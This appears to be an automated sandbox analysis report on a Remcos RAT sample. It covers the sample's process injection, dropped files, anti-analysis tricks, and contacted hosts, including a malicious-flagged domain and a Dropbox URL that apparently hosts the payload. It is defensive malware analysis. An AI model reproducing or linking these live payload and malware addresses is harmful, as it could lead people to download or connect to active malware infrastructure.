Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Process created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe" Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_004061A5 GetVersion,LdrInitializeThunk,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_004061A5

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: IMCCPHR.exe PID: 5000, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: IMCCPHR.exe PID: 5000, type: MEMORYSTR
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1650816 Sample: 25FC004658_Femetagershusenes.exe Startdate: 28/03/2025 Architecture: WINDOWS Score: 100 19 uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com 2->19 21 www.dropbox.com 2->21 23 2 other IPs or domains 2->23 29 Found malware configuration 2->29 31 Malicious sample detected (through community Yara rule) 2->31 33 Antivirus detection for URL or domain 2->33 35 6 other signatures 2->35 7 25FC004658_Femetagershusenes.exe 1 33 2->7         started        signatures3 process4 file5 15 C:\Users\user\AppData\Local\...\System.dll, PE32 7->15 dropped 17 C:\Users\user\...\Funktionsafprvningerne.exe, PE32 7->17 dropped 37 Writes to foreign memory regions 7->37 39 Tries to detect virtualization through RDTSC time measurements 7->39 41 Creates a thread in another existing process (thread injection) 7->41 43 Switches to a custom stack to bypass stack traces 7->43 11 IMCCPHR.exe 1 7 7->11         started        signatures6 process7 dnsIp8 25 edge-block-www-env.dropbox-dns.com 162.125.6.15, 443, 49726 DROPBOXUS United States 11->25 27 www-env.dropbox-dns.com 162.125.6.18, 443, 49725 DROPBOXUS United States 11->27 45 Tries to detect virtualization through RDTSC time measurements 11->45 47 Switches to a custom stack to bypass stack traces 11->47 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
162.125.6.15
 edge-block-www-env.dropbox-dns.com United States
19679 DROPBOXUS false
162.125.6.18
 www-env.dropbox-dns.com United States
19679 DROPBOXUS false

Contacted Domains

Name IP Active
edge-block-www-env.dropbox-dns.com 162.125.6.15 true
www-env.dropbox-dns.com 162.125.6.18 true
www.dropbox.com unknown unknown
uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
parosh.didns.ru true
  • Avira URL Cloud: malware
 unknown
https://www.dropbox.com/scl/fi/0jhi0626x7zqfgid1v9te/UjzebvskPbXnryFB92.bin?rlkey=65dc2nu7arz5szq4evadjxcxz&st=xm70zo43&dl=1 false
    		high